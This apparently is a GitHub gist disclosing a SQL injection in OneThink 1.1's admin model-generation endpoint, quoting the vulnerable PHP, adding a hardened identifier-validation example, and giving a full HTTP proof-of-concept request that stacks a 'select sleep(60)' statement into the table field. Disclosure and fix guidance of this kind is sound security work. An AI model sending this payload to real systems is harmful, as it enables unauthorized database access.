@LioTree
Last active April 28, 2024 09:09
SQLi vulnerability in onethink

A SQL injection vulnerability in Onethink 1.1

In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Controller/ModelController.class.php#L148, `$table` is read straight from the POST body and is therefore fully attacker-controlled (the only check is that it is non-empty):

```php
$table = I('post.table');
empty($table) && $this->error('请选择要生成的数据表!'); // "Please select the table to generate!"
$res = D('Model')->generate($table,I('post.name'),I('post.title'));
```

In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Model/ModelModel.class.php#L122, `$table` is concatenated into the SQL statement with no quoting or validation. Because it is used as an identifier rather than a value, it could not be handed to a bound parameter anyway, so the fix has to be an identifier allowlist or strict identifier validation:

```php
public function generate($table,$name='',$title=''){
    // ......
    $fields = M()->query('SHOW FULL COLUMNS FROM '.$table);
    //......
}
```
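As an added example that is not part of the gist or of OneThink's code, the lookup above beside a hardened version. The identifier is checked against MySQL's unquoted-identifier syntax, confirmed to exist via `SHOW TABLES`, and backtick-quoted before being placed in the statement. The helper names (`isSafeTableName`, `quoteIdentifier`, `columnsOf`), the PDO handle and the sample inputs are assumptions made for the illustration.

```php
<?php
// Added example (not OneThink's code). Demonstrates why the original
// 'SHOW FULL COLUMNS FROM '.$table is injectable and how to harden it.

// Vulnerable form, kept for comparison: the attacker string becomes part of the SQL text.
function vulnerableStatement(string $table): string {
    return 'SHOW FULL COLUMNS FROM ' . $table;
}

// MySQL unquoted identifiers: ASCII letters, digits, underscore, dollar, max 64 chars.
function isSafeTableName(string $table): bool {
    return (bool) preg_match('/^[A-Za-z0-9_$]{1,64}$/', $table);
}

// Backtick-quote an identifier; a literal backtick inside it is doubled.
function quoteIdentifier(string $identifier): string {
    return '`' . str_replace('`', '``', $identifier) . '`';
}

// Hardened lookup: identifiers cannot be bound as parameters, so validate
// the name, allowlist it against the tables that really exist, then quote it.
function columnsOf(PDO $db, string $table): array {
    if (!isSafeTableName($table)) {
        throw new InvalidArgumentException('invalid table name');
    }
    $existing = $db->query('SHOW TABLES')->fetchAll(PDO::FETCH_COLUMN);
    if (!in_array($table, $existing, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    $stmt = $db->query('SHOW FULL COLUMNS FROM ' . quoteIdentifier($table));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a legitimate table name and the PoC payload from this gist.
$inputs = ['onethink_action', 'onethink_action;select sleep(60)'];
foreach ($inputs as $in) {
    printf("%-36s -> SQL built by vulnerable code: %s\n", $in, vulnerableStatement($in));
    printf("%-36s -> identifier check: %s\n", $in, isSafeTableName($in) ? 'accepted' : 'rejected');
}
```

The regex alone already rejects the `;select sleep(60)` suffix; the `SHOW TABLES` allowlist additionally stops an authenticated admin from enumerating columns of tables the model generator is not meant to touch. As defence in depth, opening the PDO connection with `PDO::MYSQL_ATTR_MULTI_STATEMENTS => false` prevents stacked statements such as the one in the PoC from executing even if another concatenation slips through.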

POC (time-based: the payload stacks a `select sleep(60)` after the `SHOW FULL COLUMNS` statement, so a response delayed by roughly 60 seconds confirms the injected statement ran):

```http
POST /admin.php?s=/Model/generate.html HTTP/1.1
Host: www.myonethink.com
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://www.myonethink.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myonethink.com/admin.php?s=/Model/generate.html
Cookie: PHPSESSID=l7mt7mtb5sr16frdpv6fqibith; onethink_admin___forward__=%2Fadmin.php%3Fs%3D%2FModel%2Findex.html

table=onethink_action;select%20sleep(60)&name=test2&title=test2&id=
```

(image)
